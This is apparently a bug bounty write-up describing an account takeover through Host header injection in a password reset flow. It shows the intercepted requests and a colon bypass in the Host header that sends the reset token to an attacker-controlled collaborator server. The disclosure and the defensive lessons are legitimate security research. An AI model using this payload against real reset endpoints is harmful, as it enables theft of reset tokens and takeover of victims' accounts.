Hello Everyone , Myself Deepanshu ,Security Researcher From India.
I hope you’re all doing well! Today, I want to share a fascinating account takeover vulnerability that I recently discovered.
So I got an invite to a Private Bug bounty program on hackerone.com , The scope was very limited and its a 4 year old program , Initially it looked secured but I thought to give it a try.
So I straight away Jumped to check the Forgot Password functionality of the company main website.
I entered my email in forgot password field and intercepted the Request.
POST /auth/realms/Redacted/login-actions/reset-credentials?session_code=AbcdiQqKwDBsJcdIjZpAFW3&client_id=account&tab_id=Abcdii7y9i3qwXs HTTP/1.1
Host: login.redacted.com
Cookie: AUTH_SESSION_ID=fc59cdd34026abcd; KC_RESTART=AbcdiSldUIiiaXNFs
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: https://login.redcated.com
Referer: https://login.redacted.com/auth/realms/redacted/login-actions/reset-credentials?client_id=account&tab_id=Abcdi3qwXs
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
username=testemail%40gmail.comAs you can see this Forgot password Request , First thought came in my mind is to test for Host header injection.
I attached my burp collaborator Url in the “Host” header like this -
Host: login.redacted.com.BurpcollaboratorUrl.comI sent the request and nothing happened , it doesn’t worked.
Tried adding headers like “X-forwarded-host” and many more but it didn’t worked.
So now what? lets think the other way.
After multiple attempts ,I found out that adding anything in the Host header will not work if it’s not ending with “login.company.com”, As you have seen previously I have attached my burp collab URL at the end but It didn’t worked.
So now I tried to use burp collaborator Link at the start of the Host :
Host: burpcollaboratorUrl.com.login.redacted.comTrying this I got forgot password link to my email and it was like this :
https://abc.burpcollaborator.login.redacted.com/auth/realms/login-actions/action-token?key=ey....You can see here, although the BurpCollaborator URL reflected to the Password Reset link along with the token , but if you look closely the Server removed the “.com” of the burp collaborator URL and attached the company domain after it.
So technically , this makes it a Unknown Host ,Victim clicking on it will see “site can’t be reached” error. So basically as an attacker we cannot get any HTTP pingbacks to our Burp server that can give us the reset token.
You can see Here, for request to work properly and to steal the token we need the password reset link like this :
https://abc.burpcollaborator.com/auth/realms/login-actions/action-token?key=ey....At last, I tried to append a colon mark ( : ) in the host header like this :
Host: burpcollaboratorurl.com:login.redacted.comFinal Request Looks like this now :
POST /auth/realms/redacted/login-actions/reset-credentials?session_code=Jabcde HTTP/1.1
Host: abcd.burpcollaborator.com:login.redacted.com
Cookie: AUTH_SESSION_ID=abcdfc59cdd34026.keycloak-482-keycloak-aaalzz4; Lpaa1sXBBnfZiwyvqXMPW2E5/ikwW6fuTZCg+XlvBMY9yeptovpOaJM2xmkK0=; _ga=GA1.2.1343917884.1641975182;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: https://login.redacted.com
Referer: https://login.redacted.com/auth/realms/login-actions/reset-credentials
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
username=testemail%40gmail.comSent the request and BoooM!
This time I bypassed it and server send the Link the way we wanted it to be.
You can see now the Burp collaborator Url will work and has a token atftached to it.
Clicking on it executes the collaborator and I got HTTP pingbacks.
Successfully Got the Reset Token and completely able to takeover Victim Account.
Now You might be thinking why and how that colon ”:” mark worked in the Host header. Well here is the explanation from the company internal team.
Company Fixed it within a week Awarded me good Bounty.
I hope you all liked the writeup , till then Goodbye until the next write-up 👋.
Cheers! — Golu_369
